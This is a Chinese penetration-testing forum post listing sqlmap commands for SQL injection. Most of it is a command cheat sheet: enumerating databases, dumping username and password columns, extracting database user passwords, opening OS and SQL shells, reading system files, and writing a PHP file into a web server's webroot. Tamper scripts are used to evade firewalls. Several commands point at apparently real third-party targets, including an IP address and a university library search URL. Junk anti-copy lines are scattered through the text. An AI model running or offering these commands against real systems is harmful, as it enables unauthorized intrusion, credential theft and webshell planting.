中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
% m1 b) T5 E6 p, ^: }, R
; q: ?- H3 f: {4 c' a* H
update :::::> in the folder after execute following order : svn update
# X# J& v" p" F' j/ K# l8 P* S
7 ] y1 c0 v9 i) Z" I; J
sqlmap.py -r 1.txt --current-db
5 K: l1 I+ S( f+ Z
$ p9 U, @9 m% W6 U/ I
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
! A! h' h( {, z; ]! Q9 U+ z
6 x4 R# \6 _3 t, ?# Z# R: `& J. i
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
/ ~* y8 E! R. G/ u$ o0 U
猜解数据库
3 s) M. ?: M4 U* v0 {1 X, n
./sqlmap.py -u "injection-url" --dbs
" L. @; r. W# r) n: n
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
3 B1 l: ~% R/ y { |+ b E
" a8 B4 P5 X. J. p7 J
猜解表名
& E- Z0 P" c# S5 X
./sqlmap.py -u "injection-url" -D database_name --tables
; j8 w6 d5 `+ H0 C" N, n& W
; q8 y% k9 l) |* ]$ l p& a
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
, c7 S8 l2 y2 }( I
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! S$ Y2 B" k4 o% w1 _
/ e9 ? \$ k2 {2 g" y
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
- O# ]) T9 f1 r T W
G+ M1 c6 m' ~7 K$ I
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
( ?; y0 h- O" N6 T& R
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
1 t \2 I Q1 ^
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
. ^4 ^- G* b: J
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
$ f( g$ x& p6 Z4 B- d, W& r
, r* y: H/ u0 J; S# x
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
: ?0 r& @# j1 i" M
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
t0 r0 I/ h9 r- b
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
" Z9 Q4 q" Y4 ?, J) `
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
* d$ f$ i: L5 K+ e% h5 A0 a1 x3 r
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
0 Y/ f2 R& `% |( N& e6 k6 h
5 ^8 x2 L! J9 n5 p3 E/ S2 |
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
& I2 x6 f" u9 q5 c
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
: N' E7 U4 J& b: \
' b! k8 J: I" g0 q
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
7 ?8 D q$ O8 l3 x
猜解列名
( R+ l$ K4 V' v+ D7 ?, n( S( \6 c
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
0 s$ F3 A" ?# h
" I7 I4 z4 V2 h; i) l5 i) H
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
( m9 ]% ]+ R/ c- O
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
* j O+ D, N* _/ e
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
. v6 R, f, j* b+ w, x- C5 | ?
9 W a: \( f- z! ~6 Y" O) f* r
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
! e5 d5 U) Q3 c2 v W8 D y
&submit=Go
4 g2 J( N# Y4 N7 O' o+ j7 v( H
猜解值
5 t6 T" N4 d2 @2 W" y
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
9 x0 H# M, h4 {- o
========================================================
! }4 U3 Z2 g+ ^! |% \6 ?& O
搜索表名中包括mana字符的
3 `- L4 ?' ^. O9 \ w, B3 _
/sqlmap.py -u "injection-url" -T mana --search
7 V" [3 ^+ q6 S) ^1 f: y
返回一个交互式sql shell
* g2 U/ ~6 L$ @0 o# |
/sqlmap.py -u "injection-url" --sql-shell
5 X5 U2 k) I7 x8 t3 @ G0 `
读取指定文件(需权限)
) N' x8 P$ K4 w$ L! B9 _
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
, s" N' V2 b3 D( |8 z+ ~
查看当前 用户 及 数据库
/ y0 _; \7 Z4 G \0 x
/sqlmap.py -u "injection-url" --current-user --current-db
" X4 e3 @: {8 c6 i* x9 \
本地文件 写入 远程目标绝对路径
& I, J( g5 L4 s4 v# Z% Y3 m
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
) T& G z2 p; c: S" y* {5 |- @7 s
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
8 u+ a: M! ^7 |$ H. Y( ^
2 R, [0 ~- M8 k, _$ L3 W
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
4 G0 M+ x7 I, p% ^ V
查看某用的权限
9 Z, g" i$ x2 c3 ]
/sqlmap.py -u "injection-url" --privileges -U root
4 V4 Z3 E, \! u8 [' m$ s; T' a. K
查看当前用户是否为dba
. O& ]& p; @7 v, z+ @4 _ ~( D
/sqlmap.py -u "injection-url" --is-dba
1 C: t) _8 F1 U1 X A, M
读取所有数据库用户或指定数据库用户的密码
! Q, D6 a& N2 W$ z( \6 F
sqlmap.py -r 1.txt --users --passwords
. Y4 I" ^* P+ O; b* c
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
7 A2 }/ Q$ W& t; y' _* m' q
0 y1 L' [* }5 b2 b
/sqlmap.py -u "injection-url" --passwords -U root
- V1 t% X ]( a
: L X) h9 Y$ Z! _6 D" O$ B1 [
--start&&--stop 与 --first&&--last 的区别
& a# k+ H7 Y2 q9 b8 K, `
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
( c: w! u0 }0 ]' Y
2 |- P5 I; ]1 O% A4 V
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
0 g, K5 l! v3 R- y
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
% }0 \" W( L4 H( f/ {% s" Z2 r
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
; T2 O( [) U- Q$ j8 u& e6 r; }( Q8 v
: v8 A1 ~ J8 f# V: M* ]* w
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
0 `$ y4 ?& j5 \& Q8 ]
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
* G2 n) d' P2 _& h! X- d d
5 T* E( |$ E" }4 t
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2